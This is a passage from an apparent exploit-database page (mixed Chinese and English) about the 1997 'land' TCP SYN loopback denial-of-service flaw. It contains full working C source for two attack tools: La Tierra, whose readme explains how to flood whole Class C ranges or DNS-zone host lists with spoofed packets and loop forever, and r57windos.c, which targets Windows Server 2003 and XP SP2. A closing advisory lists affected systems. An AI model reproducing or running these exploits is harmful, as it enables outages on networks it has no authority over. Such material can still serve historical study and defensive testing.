sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet\n");
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}


		

- 漏洞信息 (20813)

FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4) (EDBID:20813)
multiple remote
1997-11-20 Verified
0 MondoMan
N/A [点击下载]
source: http://www.securityfocus.com/bid/2666/info
   
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
   
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
   
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 

/**************************************************************/
/*                                                            */
/*  La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net     */
/*                                                            */
/*  Modified version of land.c by m3lt, FLC                   */
/*                                                            */
/*  Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz     */
/*  gcc version 2.7.2.1       tabs set to 3                   */
/*                                                            */
/*  gcc latierra.c -o latierra                                */
/*                                                            */
/*  Refer to readme.txt for more details and history          */
/*                                                            */
/**************************************************************/                                  
#include <stdio.h>
#include <getopt.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h> 

#define DEFAULT_FREQUENCY		1 
#define TRUE	 					1
#define FALSE   					0
#define FOR_EVER 					-5
#define LIST_FILE  				1
#define ZONE_FILE  				2
#define MAXLINELENGTH 			512
#define DEFAULT_SEQ				0xF1C
#define DEFAULT_TTL           0xFF
#define DEFAULT_TCPFLAGS      (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE       0xFDE8

struct pseudohdr
	{
   struct in_addr saddr;
   struct in_addr daddr;
   u_char zero;
   u_char protocol;
   u_short length;
   struct tcphdr tcpheader;
	};

typedef struct latierra_data
	{
	char dest_ip[256];
	int  tcp_flags;
	int  window_size;
	int  ip_protocol;
	int  sequence_number;
	int  ttl;
	int  supress_output;
        int  message_type;
	} LATIERRA_DATA;

void alternatives(void);
int  get_ip(int use_file, FILE *fp, char *buff);
int  land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);

/********/
/* main */
/********/
int main(int argc, char **argv)
{
	FILE *fp;
	LATIERRA_DATA ld;
	int frequency = DEFAULT_FREQUENCY, x;
	int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
	int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
   char got_ip = FALSE, got_beg_port = FALSE;
	char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];

	printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
   printf("Enhanced version of land.c originally developed by m3lt, FLC\n");

	strcpy(valid_tcp_flags, "fsrpau");
	ld.tcp_flags = 0;
	ld.window_size = DEFAULT_WINSIZE;
	ld.ip_protocol = IP_TCP;
	ld.sequence_number = DEFAULT_SEQ;
	ld.ttl = DEFAULT_TTL;
	ld.message_type = 0;
	
	if(argc > 1 && (!strcmp(argv[1], "-a")))
		alternatives();

	if(argc > 1 && (!strcmp(argv[1], "-n")))
		nslookup_help();

	if(argc > 1 && (!strcmp(argv[1], "-p")))
		protocol_list();

	if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
		print_arguments();

	while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
		{
		switch(i)
			{	
			case 't':
				for(x=0;x<strlen(optarg);x++)
					switch(optarg[x])
						{
						case 'f':                        /* fin */
							ld.tcp_flags |= TH_FIN;
							break;
						case 's':                        /* syn */
							ld.tcp_flags |= TH_SYN;
							break;
						case 'r':                        /* reset */
							ld.tcp_flags |= TH_RST;
							break;
						case 'p':                        /* push */
							ld.tcp_flags |= TH_PUSH;			
							break;
						case 'a':                        /* ack */
							ld.tcp_flags |= TH_ACK;
							break;
						case 'u':                        /* urgent */
							ld.tcp_flags |= TH_URG;
							break;
						default:
							printf("\nERROR: Invalid option specified [ %c ] for tcp_flags.\n\n", optarg[x]);
							return(-12);
							break;
						}
				break;
			case 'q':
				ld.sequence_number = atoi(optarg);
				break;
			case 'w':
				ld.window_size = atoi(optarg);
				break;
			case 'm':
				ld.message_type = atoi(optarg);
				break;
			case 'v':
				ld.ttl = atoi(optarg);
				break;
			case 'p':
				ld.ip_protocol = atoi(optarg);
				break;
			case 'o':
				ld.supress_output = TRUE;
				break;
			case 'i':
				if(strlen(optarg) > 1)
					strcpy(ld.dest_ip, optarg);
				else
					{
					printf("ERROR: Must specify valid IP or hostname.\n");
					return(-6);
					}
				got_ip = TRUE;
				break;
			case 's':
				frequency = atoi(optarg);	
				break;
			case 'l':
				loop = atoi(optarg);
				break;
			case 'b':
				beginning_port = atoi(optarg);
				got_beg_port = TRUE;
				break;
			case 'e':
				ending_port = atoi(optarg);
				break;
			}
		}

	if(!ld.tcp_flags)
		ld.tcp_flags = DEFAULT_TCPFLAGS;

	if(!got_beg_port)
		{
		fprintf(stderr, "\nMust specify beginning port number.  Use -h for help with arguments.\n\n");
		return(-7);
		}

	if(ending_port == 0)
		ending_port = beginning_port;

	printf("\nSettings:\n\n");

   printf("  (-i)   Dest. IP Addr   : ");

	if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
		{
		ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
		strcpy(class_c_addr, ld.dest_ip);
		strcat(ld.dest_ip, "1");
		printf(" %s (Class C range specified).\n", ld.dest_ip);
		increment_addr = TRUE;
		octet = 1;
		}
	else
		if(strlen(ld.dest_ip) > 5)
			{
			if(strncmp(ld.dest_ip, "zone=", 5)==0)
				{
				strcpy(filename, &ld.dest_ip[5]);
				printf("%s (using DNS zone file)\n", filename);
				use_file = ZONE_FILE;
				}	
			else if(strncmp(ld.dest_ip, "list=", 5) == 0)
				{
				strcpy(filename, &ld.dest_ip[5]);
				printf("%s (using ASCII list)\n", filename);
				use_file = LIST_FILE;
				}
			else
				printf("%s\n", ld.dest_ip);
			}
		else 
			{
			printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
			return(-9);
			}

	printf("  (-b)   Beginning Port #: %d\n",     beginning_port );
	printf("  (-e)   Ending Port #   : %d\n",     ending_port );
	printf("  (-s)   Seconds to Pause: %d\n",     frequency );
	printf("  (-l)   Loop            : %d %s\n",  loop, (loop == FOR_EVER) ? "(forever)" : " " );
	printf("  (-w)   Window size     : %d\n",     ld.window_size );
	printf("  (-q)   Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
	printf("  (-v)   Time-to-Live    : %d\n",     ld.ttl);
	printf("  (-p)   IP Protocol #   : %d\n",     ld.ip_protocol );
	printf("  (-t)   TCP flags       : "); 

	strcpy(buff, "");

	if( ld.tcp_flags & TH_FIN)
		strcat(buff, "fin ");
	if( ld.tcp_flags & TH_SYN)
		strcat(buff, "syn ");
	if(ld.tcp_flags & TH_RST)
		strcat(buff, "rst ");
	if(ld.tcp_flags & TH_PUSH)
		strcat(buff, "push ");
	if(ld.tcp_flags & TH_ACK)
		strcat(buff, "ack ");
	if(ld.tcp_flags & TH_URG)
		strcat(buff, "urg ");

	printf("%s\n\n", buff);
			
	if(ending_port < beginning_port)
		{
		printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
		return(-8);
		}
	
	scan_loop = loop_val = loop;
	
	if(use_file)
		{
		if(access(filename, 0))
			{
			printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
			return(-9);
			}

		if( (fp = fopen(filename, "rt")) == NULL)
			{
			printf("ERROR: Unable to open %s.\n", filename);
			return(-10);
			}

		if(!get_ip(use_file, fp, buff))
			{
			printf("Unable to get any IP address from file %s.\n");
			return(-11);
			}

		strcpy(ld.dest_ip, buff);
		}
	
	while( (loop == FOR_EVER) ? 1 : loop-- > 0)
		{
		for(i=beginning_port; i <= ending_port; i++)
			{
			if(land(&ld, i))        /* go for it BaBy! */
				break;

   		if(frequency)          /* make sure freq > 0 */
			 	{
				if(!ld.supress_output)
					printf("-> paused %d seconds.\n", frequency);
				sleep(frequency);
				}
			}

		if( (!use_file) && (loop && increment_addr) )
			{
			char temp_addr[21];

			if(++octet > 254)                        /* check for reset */
				{
				if(loop_val != FOR_EVER)              /* make sure not to distrute forever! */
					{
					if(++scan_loop > loop_val)        /* check if scanned x times */
						break;
					else
						loop = loop_val;                /* restore original value */
					}
				octet = 1;	                          /* reset */
				}

			sprintf(temp_addr, "%s%d", class_c_addr, octet);
			strcpy(ld.dest_ip, temp_addr);
		
			if(!ld.supress_output)
				printf("** incrementing to next IP address: %s\n", ld.dest_ip);

			if(scan_loop > loop_val)
				break;	/* break while loop */
			}
		else if(use_file)
			{
			if(!get_ip(use_file, fp, buff))
				break;
		
			loop++;

			strcpy(ld.dest_ip, buff);
			}

		} /* end while */

	printf("\nDone.\n\n");
} /* end main */

int  get_ip(int use_file, FILE *fp, char *buff)
{
	if(use_file == LIST_FILE)
		return(get_ip_from_list(fp, buff));
		
	return(get_ip_from_zone(fp, buff));
}

int get_ip_from_list(FILE *fp, char *buff)
{
	int ret_val;

	while(1)
		{
		ret_val = (int)fgets(buff, MAXLINELENGTH, fp);

		if((ret_val == EOF) || (ret_val == (int)NULL))
			return 0;

		if( strlen(buff) >= 7)
			if((buff[0] != ';') && (buff[0] != '['))
				{
				if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
					buff[strlen(buff)-1] = 0x0;

				return 1;
				}
		}

	return 0;
}

int get_ip_from_zone(FILE *fp, char *buff)
{
	int ret_val, i;
	char *p, delim[8];

	strcpy(delim, " \t");

	while(1)
		{
		ret_val = (int)fgets(buff, MAXLINELENGTH, fp);

		if((ret_val == EOF) || (ret_val == (int)NULL))
			return 0;

		if( strlen(buff) >= 7)
			if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
				{
				if( (p = strtok( buff, delim)) == NULL)
					continue;

				if( (p = strtok(NULL, delim)) == NULL)
					continue;

				if(strcmp(p, "A"))   /* be sure second column is an DNS A record */
					continue;
				
				if( (p = strtok(NULL, delim)) == NULL)
					continue;

				strcpy(buff, p);

				/* verify that we have a valid IP address to work with */

				if(inet_addr(p) == -1)
					continue;

				/* strip off training line characters */
				
				if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
					buff[strlen(buff)-1] = 0x0;

				return 1;
				}
		}

	return 0;
}

/************/
/* checksum */
/************/
u_short checksum(u_short * data,u_short length)
{
	register long value;
	u_short i;

	for(i = 0; i< (length >> 1); i++)
		value += data[i];

	if((length & 1)==1)
		value += (data[i] << 8);

	value = (value & 0xFFFF) + (value >> 16);

	return(~value);
}

/********/
/* land */
/********/
int land(LATIERRA_DATA *ld,  int port_number)
{
	struct sockaddr_in sin;
   int sock;
   char buffer[40];
   struct iphdr * ipheader = (struct iphdr *) buffer;
   struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
   struct pseudohdr pseudoheader;

	bzero(&sin,sizeof(struct sockaddr_in));

   sin.sin_family=AF_INET;

   if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
   	{
      printf("ERROR: unknown host %s\n", ld->dest_ip);
      return(-1);
      }

	if((sin.sin_port=htons(port_number))==0)
  		{
      printf("ERROR: unknown port %s\n",port_number);
      return(-2);
      }

	if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
   	{
      printf("ERROR: couldn't allocate raw socket\n");
      return(-3);
      }

	bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));

   ipheader->version=4;
   ipheader->ihl=sizeof(struct iphdr)/4;
   ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
   ipheader->id=htons(ld->sequence_number);
   ipheader->ttl = ld->ttl;
   ipheader->protocol = ld->ip_protocol;
   ipheader->saddr=sin.sin_addr.s_addr;
   ipheader->daddr=sin.sin_addr.s_addr;

   tcpheader->th_sport = sin.sin_port;
   tcpheader->th_dport = sin.sin_port;
   tcpheader->th_seq = htonl(ld->sequence_number);
   tcpheader->th_flags = ld->tcp_flags;
   tcpheader->th_off = sizeof(struct tcphdr)/4;
   tcpheader->th_win = htons(ld->window_size);

   bzero(&pseudoheader,12+sizeof(struct tcphdr));

   pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.protocol = ld->ip_protocol;
   pseudoheader.length = htons(sizeof(struct tcphdr));
   bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
   tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

   if( sendto(sock, 	buffer, 
							sizeof(struct iphdr)+sizeof(struct tcphdr),
							ld->message_type,
							(struct sockaddr *) &sin,
							sizeof(struct sockaddr_in) )==-1)
   	{
      printf("ERROR: can't send packet. (sendto failed)\n");
      return(-4);
      }

	if(!ld->supress_output)
		printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);

   close(sock);

   return(0);
}
/* End of land */

void alternatives()
{
	printf("\nAlternative command line arguments for option -i\n\n");

	printf("    You can create two types of files that latierra can use to get\n");
	printf("    a list of IP addresses, a simple ASCII file with each IP address\n");
	printf("    appearing on each line or better yet, a DNS zone file created by\n");
	printf("    nslookup.  If you are unfamiliar with nslookup, specify a '-n' on the\n");
	printf("    command line of latierra.\n\n");
	printf("    Basically, latierra will walk down the list and send the spoofed packet\n");
	printf("    to each IP address.  Once the list is complete, and loop > 1, the list\n");
 	printf("    is repeated.   To specify that the '-i' option should use a zone file,\n");
	printf("    specify \"zone=filename.txt\" instead of an IP address.  To specify a \n");
	printf("    simple ASCII list of IP addresses, use \"list=filename.txt\".  Lines\n");
	printf("    beginning with ';' or '[' are ignored.  Lines that are not an 'A' \n");
	printf("    record (second column)in a zone file will ignored.\n\n");

	exit(-1);
}

void nslookup_help()
{
	printf("\nNSLOOKUP help\n\n");
	

	printf("To see who is the DNS server for a particular domain, issue the following:\n");
	printf("        > set type=ns\n");
	printf("        > xyz.com\n\n");
	printf("  You will see a list of the name server(s) if completed successfully\n\n");

	printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
	printf("and issue the following commands:\n");
	printf("         > server 1.1.1.1\n");
	printf("         > ls -d xyz.com > filename.txt\n\n");

	printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
	printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n"); 

	exit(-1);
}

void protocol_list()
{
	printf("\nProtocol List:\n\n");	
	printf("Verified:\n");
	printf("1-ICMP   2-IGMP   3-GGP  5-ST   6-TCP   7-UCL   8-EGP   9-IGP  10-BBN_RCC_MON\n");
	printf("11-NVP11   13-ARGUS   14-EMCON   15-XNET   16-CHAOS   17-UDP   18-MUX\n");
	printf("19-DCN_MEAS   20-HMP   21-PRM   22-XNS_IDP   23-TRUNK1   24-TRUNK2\n");
	printf("25-LEAF1   26-LEAF2    27-RDP   28-IRTP      29-ISO_TP4  30-NETBLT\n");
	printf("31-MFE_NSP   32-MERIT_INP   33-SEP   34-3PC   62-CFTP    64-SAT_EXPAK\n");
	printf("66-RVD       67-IPPC        69-SAT_MON   70-VISA         71-IPCV\n");
	printf("76-BR_SAT_MON   77-SUN_ND   78-WB_MON   79-WB_EXPAK   80-ISO_IP\n");
	printf("81-VMTP   82-SECURE_VMTP   83-VINES  84-TTP   85-NSFNET_IGP   86-DGP\n");
	printf("87-TCF    88-IGRP          89-OSPFIGP         90-SPRITE_RPG   91-LARP\n\n");
	printf("Supported:\n");
	printf("    6-TCP     17-UDP    (future: PPTP, SKIP) \n\n");

	exit(-1);
}

void print_arguments()
{
	printf("Arguments: \n");
	printf("     *   -i dest_ip = destination ip address such as 1.1.1.1\n");
	printf("                If last octet is '-', then the address will increment\n");
	printf("                from 1 to 254 (Class C) on the next loop\n");
	printf("                and loop must be > 1 or %d (forever).\n", FOR_EVER);
	printf("                Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
	printf("                For list of alternative options, use  -a instead of -h.\n");
	printf("     *   -b port# = beginning port number (required).\n");
        printf("         -e port# = ending port number (optional)\n");
	printf("         -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
	printf("         -v = time_to_live value, default=%d\n", DEFAULT_TTL);
	printf("         -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
	printf("         -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
	printf("         -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
	printf("         -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
	printf("         -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
	printf("         -o 1 = supress additional output to screen, default=0\n" );
	printf("         -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
	printf("     * = required     ~ = default parameter values\n\n");
	exit(-1);
}
/* End of file */


----------------- readme.txt  ------------------------------

La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net

       Modified version of land.c by m3lt, FLC

To compile latierra, type:

	gcc latierra.c -o latierra

	To see the help screen, use 'latierra -h'

This program crashes Windows 95, and will cause Windows NT  
4.0, SP3 to utilize a high percentage of CPU.  In some     
instances, CPU usage reaches %100.
                                                         
land.c description:                                        

land.c sends a spoofed packet with the SYN flag from the   
the same IP and port number as the destination.  For       
example, if you want to do a DoS on 1.1.1.1, port 80, it would   
spoof 1.1.1.1 port 80 as the source.  The problem is with  
NT4 SP3, however, is once you issue this packet to a     
port, NT4 SP3 appears to ignore all other attempts -

UNTIL ...
                                                            
                     La Tierra!
                                                            
La Tierra description:                                     
                                                            
La Tierra basically works by sending NT the same packet
used in land.c but to more than one port (if specified).
It doesn't appear to matter if the port is opened or closed!
NT doesn't appear to let this happen again on the same port
successively, but you simply change ports, and you can easily 
go back to the original port and it'll work again. What's even
more interesting is the fact that port 139 works with this.
You would have thought - I'll leave that alone for now!

While testing, I used a Compaq dual Intel Pentium Pro 200, and
was able to take up to %64 CPU.  With one processor disabled, 
CPU usage was %100.  NT4 SP3 doesn't seem to crash, just needs
time to recover, even with one spoofed packet.

Features include:

	- Ability to launch a DoS on an entire class C address
	- Specify the beginning and ending port range
	- Specify the number of loops or make it loop forever!
	- User defined TCP flags: fin, syn, reset, push, ack, 
	  and urgent
	- Other IP options such as window size, time-to-live, 
	  sequence_number, and message_type
	- Ability to read a DNS zone file for IP addresses
	- Ability to read a ASCII file containing IP addresses

Command line options:

     - i ip_address

	DEFAULT: None
	RANGE: Valid IP Address
	OPTIONAL: No

	where ip_address is a valid ip_address, or if you wish to
	cycle through a class C address, the last octet is dropped
        and replaced with a '-'.  This option is required.  The 
	source and destination address are obtained from this value.

	Rather than specifying an IP address, you may wish to create
        an ASCII file, or better yet, use nslookup to obtain all 
        zone information for a particular domain.  The ASCII file
	simply contains a list of IP addresses, one on each line.

	To get a DNS file, simply use nslookup, and the 
	"ls -d somedomain.com > filename.txt" command.  You can use
	'latierra -n' to read more about the command sequence for
	nslookup.

	In both types of files, lines that begin with ';' or '[' are 
	ignored. In DNS files, only 'A' records are processed.

	Examples:

	   Single IP Address:
		-i 10.1.2.1

	   Class C range:
		-i 10.1.2.-

	   ASCII file:
		-i list=filename.txt

	   DNS file:
		-i zone=filename.txt

     -b beginning_port_number

	DEFAULT: None
	RANGE: Positive Integer
	OPTIONAL: No

	where this value is the port_number that latierra will use. If
	no ending_port_number is specified, ending_port_number is then
	equal to this value.  Valid range is 1 to 0xFFFF

     -e ending_port_number

	DEFAULT: If not specified, equal to beginning_port_number
	RANGE: Positive Integer
	OPTIONAL: Yes

	is the highest port number in the range to cycle through. 

	Example:

		-i 10.1.2.1 -b 23 -e 80

	will start at port 23 and increment up to port 80.  You can 
        delay the next increment by using the -s option.  Valid range
	is 1 to 0xFFFF

     -s seconds_between_spoofs

	DEFAULT: 1
	RANGE: Positive Integer
	OPTIONAL: Yes

	You may want to control the seconds between spoofs.  If you
        specify a zero, no delays occur.

	In the below example, the spoof will between ports 23 and 80,
	every 3 seconds.

		-i 10.1.2.1 -b 23 -e 80 -s 3

     -l number_of_loops
	
	DEFAULT: 1
	RANGE: Positive Integer, -5 loops forever
	OPTIONAL: Yes
	
	This option if set greater than 1, will cause a repeat of the
        cycle.  For example:

		-i 10.1.2.1 -b 23 -e 80 -s 0 -l 8

	will cause latierra to go through ports 23 through 80 and
	repeat the process 8 times, with no delay.  Look at the
	following example:

		-i 10.1.2.- -b 23 -e 80 -s 0 -l 8

	latierra will start at 10.1.2.1, port 23 through 80, then
	increment to 10.1.2.2, port 23 through 80, and so on until
	it gets to 10.1.2.254, in which case it will repeat the
	same procedure over again 8 times.

	By specifying a value of -5 for this option, latierra will
	loop forever, until you manually stop the process.  In the
	last example above, the procedure would never end.  When it
	reaches 10.1.2.254, it falls back to 10.1.2.1 and start
	over again from there.

	Other examples:

		-i 10.1.2.1 -b 139 -s 0 -l -5
		-i 10.1.2.- -b 80 -s 5 -l 10
                                                      
     -t tcp_flags

	DEFAULT: sp   (SYN, PUSH)
	RANGE: valid character set (see below)
	OPTIONAL: Yes

	this option sets the various TCP flags, which include:

		f = fin		s = syn		r = reset
		p = push	a = ack		u = urgent

	Example:

		-i 10.1.2.1 -b 139 -t apu -s 0

		To set the ack, push, and urgent flag

     -v time_to_live_value

	DEFAULT: 0xFF (255 decimal)
	RANGE: Positive Integer
	OPTIONAL: Yes

	Sets the time to live value.

     -p protocol_value

	DEFAULT: 6 (tcp)
	RANGE: Positive Integer
	OPTIONAL: Yes

	Sets the protocol value in the IP header.  To see a list of 
 	available protocols, run "latierra -p".

     -w window_size_value

	DEFAULT: 0xFFFF (65000 decimal)
	RANGE: Positive long value
	OPTIONAL: Yes

     -q tcp_sequence_number_value

	DEFAULT: 0xF1C
	RANGE: Positive integer
	OPTIONAL: Yes

     -o 1 supress_additional_output

	DEFAULT: messages are printed for status
	RANGE: None
	OPTIONAL: Yes

	If you don't want to see the messages during the process,
	simply use this "-o 1" to turn them off.

Final Note:

Please use this program for in-house testing purposes only.  

Just because your sending spoofed packets, doesn't mean you 
can't be traced.

Good luck.

- MondoMan
elmondo@usa.net
                                                          
-------------------- end of file -------------------------------
		

- 漏洞信息 (20814)

FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5) (EDBID:20814)
windows remote
1997-11-20 Verified
0 Dejan Levaja
N/A [点击下载]
source: http://www.securityfocus.com/bid/2666/info
    
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
    
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
    
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 

#define _BSD_SOURCE

#include <stdio.h> 
#include <ctype.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <netinet/in_systm.h> 
#include <netinet/ip.h> 
#include <netinet/tcp.h> 
#include <sysexits.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <sys/types.h> 

/* 
Windows Server 2003 and XP SP2 remote DoS exploit 
Tested under OpenBSD 3.6 at WinXP SP 2 
Vuln by Dejan Levaja <dejan_@_levaja.com>
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru 
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor 
Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy 
All rights reserved. 
*/ 

//checksum function by r0ach 
u_short checksum (u_short *addr, int len) 
{ 
u_short *w = addr; 
int i = len; 
int sum = 0; 
u_short answer; 
while (i > 0) 
{ 
sum += *w++; 
i-=2; 
} 
if (i == 1) sum += *(u_char *)w; 
sum = (sum >> 16) + (sum & 0xffff); 
sum = sum + (sum >> 16); 
return (~sum); 
} 
int main(int argc, char ** argv) 
{ 
struct in_addr src, dst; 
struct sockaddr_in sin; 
struct _pseudoheader { 
struct in_addr source_addr; 
struct in_addr destination_addr; 
u_char zero; 
u_char protocol; 
u_short length; 
} pseudoheader; 
struct ip * iph; 
struct tcphdr * tcph; 
int mysock; 
u_char * packet; 
u_char * pseudopacket; 
int on = 1; 
if( argc != 3) 
{ 
fprintf(stderr, "r57windos.c by __blf\n"); 
fprintf(stderr, "RusH Security Team\n"); 
fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]); 
return EX_USAGE; 
} 
if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) 
{ 
perror("malloc()\n"); 
return EX_OSERR; 
} 
inet_aton(argv[1], &src); 
inet_aton(argv[1], &dst); 
iph = (struct ip *) packet; 
iph->ip_v = IPVERSION; 
iph->ip_hl = 5; 
iph->ip_tos = 0; 
iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); 
iph->ip_off = htons(IP_DF); 
iph->ip_ttl = 255; 
iph->ip_p = IPPROTO_TCP; 
iph->ip_sum = 0; 
iph->ip_src = src; 
iph->ip_dst = dst; 
tcph = (struct tcphdr *)(packet +sizeof(struct ip)); 
tcph->th_sport = htons(atoi(argv[2])); 
tcph->th_dport = htons(atoi(argv[2])); 
tcph->th_seq = ntohl(rand()); 
tcph->th_ack = rand(); 
tcph->th_off = 5; 
tcph->th_flags = TH_SYN; // setting up TCP SYN flag here 
tcph->th_win = htons(512); 
tcph->th_sum = 0; 
tcph->th_urp = 0; 
pseudoheader.source_addr = src; 
pseudoheader.destination_addr = dst; 
pseudoheader.zero = 0; 
pseudoheader.protocol = IPPROTO_TCP; 
pseudoheader.length = htons(sizeof(struct tcphdr)); 
if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) 
{ 
perror("malloc()\n"); 
return EX_OSERR; 
} 
memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); 
memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); 
tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); 
mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); 
if(!mysock) 
{ 
perror("socket!\n"); 
return EX_OSERR; 
} 
if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) 
{ 
perror("setsockopt"); 
shutdown(mysock, 2); 
return EX_OSERR; 
} 
sin.sin_family = PF_INET; 
sin.sin_addr = dst; 
sin.sin_port = htons(80); 
if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) 
{ 
perror("sendto()\n"); 
shutdown(mysock, 2); 
return EX_OSERR; 
} 
printf("Packet sent. Remote machine should be down.\n"); 
shutdown(mysock, 2); 
return EX_OK; 
} 
		

- 漏洞信息

14789
Multiple Vendor Malformed TCP SYN Loopback Packet Remote DoS (land)
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

1997-12-17 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor loopback (land.c) Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 2666
Yes No
1997-11-20 12:00:00 2009-07-11 06:06:00
Posted to BugTraq by m3lt <meltman@lagged.net> on November 20, 1997.

- 受影响的程序版本

Sun SunOS 4.1.4
Sun SunOS 4.1.3 _U1
SCO Unixware 2.1
SCO Open Server 5.0
SCO Open Desktop 3.0
SCO CMW+ 3.0
Novell Netware 4.1
NetBSD NetBSD 1.2.1
NetBSD NetBSD 1.2
NetBSD NetBSD 1.1
NetBSD NetBSD 1.0
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
